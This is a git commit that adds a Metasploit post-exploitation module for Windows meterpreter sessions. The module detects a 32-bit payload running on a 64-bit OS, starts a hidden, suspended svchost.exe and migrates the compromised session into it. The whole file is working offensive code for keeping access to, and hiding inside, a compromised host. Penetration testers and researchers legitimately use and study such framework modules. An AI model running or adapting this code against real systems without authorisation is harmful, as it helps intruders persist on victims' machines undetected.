Added archmigrate module to metasploit.

Koen Riepe · Koen Riepe · commit 45b1f796e431 · 2017-02-24T10:29:19.000+01:00
diff --git a/modules/post/windows/manage/archmigrate.rb b/modules/post/windows/manage/archmigrate.rb
@@ -0,0 +1,58 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Registry
+  include Msf::Post::File
+  include Msf::Post::Common
+
+    def initialize(info={})
+        super(update_info(info,
+          'Name'          => 'Architicture Migrate',
+          'Description'   => %q{This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a new process with the correct architecture and migrates into that process.},
+          'License'       => MSF_LICENSE,
+          'Author'        => ['Koen Riepe (koen.riepe@fox-it.com)'],
+          'References'    => [''],
+          'Platform'      => [ 'win' ],
+          'Arch'          => [ 'x86', 'x64' ],
+          'SessionTypes'  => [ 'meterpreter' ]
+        ))
+    end
+
+    def is_32_bit_on_64_bits()
+        apicall = session.railgun.kernel32.IsWow64Process(-1,4)["Wow64Process"]
+        if apicall == "\x00\x00\x00\x00"
+            migrate = false
+        else
+            migrate = true
+        end
+        return migrate
+    end
+
+    def get_windows_loc()
+        apicall = session.railgun.kernel32.GetEnvironmentVariableA("Windir",255,255)["lpBuffer"]
+        windir = apicall.split(":")[0]
+        return windir
+    end
+
+    def run
+        if is_32_bit_on_64_bits()
+            print_error("The meterpreter is not the same architecture as the OS! Upgrading!")
+            windir = get_windows_loc()
+            newproc = windir + ':\windows\sysnative\svchost.exe'
+            if exist?(newproc)
+                print_status("Starting new x64 process #{newproc}")
+                pid = session.sys.process.execute(newproc,nil,{'Hidden' => true,'Suspended' => true}).pid
+                print_good("Got pid #{pid}")
+                print_status("Migrating..")
+                session.core.migrate(pid)
+                if pid == session.sys.process.getpid
+                    print_good("Success!")
+                else
+                    print_error("Migration failed!")
+                end
+            end
+        else
+            print_good("The meterpreter is the same architecture as the OS!")
+        end
+    end
+end
